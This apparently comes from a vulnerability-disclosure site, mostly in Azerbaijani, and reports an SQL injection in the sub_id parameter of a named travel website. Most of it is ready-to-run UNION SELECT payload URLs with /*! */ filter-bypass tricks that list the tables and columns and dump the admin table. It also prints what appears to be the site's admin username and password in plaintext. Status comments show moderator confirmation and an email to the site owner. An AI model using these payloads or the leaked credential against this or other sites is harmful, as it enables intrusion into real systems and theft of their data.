Travel-azlat.az / sub_id Parametr Sql Injection

travel-azlat.az 20 June 2016, 17:08

Detailed information

http://www.travel-azlat.az/?id=5&sub_id= # Sql Inj Vunl
# Column Sayi 26
# version >5
# Login : Admin
# Pass : admin124azlat
# Table_name : admin
# Column_names : login pass
# Datalar Gelen column saylari 6,9
Datalari Latin1 Convert ederek ekrana cixarmag olar ve 406 not acept olduguna gore /*! */ emrleri bu simvollarin arasina yazarag bypass etmek olar
<tr>
<td class="text" valign="top" height="160">(HTML KODLARDA DATALAR BU HISSEDE GORUNUR )</td>
</tr>
http://www.travel-azlat.az/?id=5&sub_id=-204' /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,/*!CONVERT(group_concat(table_name) USING latin1)*/,10,11,12 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema=database()*/--+-'&lang=2 # Table adlari
http://www.travel-azlat.az/?id=5&sub_id=-204' /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,/*!CONVERT(group_concat(column_name) USING latin1)*/,10,11,12 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61646d696e*/--+-'&lang=2 # Column adlari
http://www.travel-azlat.az/?id=5&sub_id=-204' /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,/*!CONVERT(group_concat(login,0x3a,pass ) USING latin1)*/,10,11,12 /*!from*/ /*!admin*/--+-'&lang=2 # Admin Data

Comments

  • 21 October 2016, 13:56
    Vulnerability status
    Have not any information from source

  • 22 August 2016, 10:28
    Vulnerability status
    Sended e-mail to source about vulnerability

  • 21 June 2016, 13:47
    Added point to Vulnerability
    Moderator gave 8 point from 10 to vulnerability

  • 21 June 2016, 13:46
    Vulnerability status
    Confirmed by Moderator

  • 20 June 2016, 17:08
    Vulnerability added
    Vulnerability added to BUGemot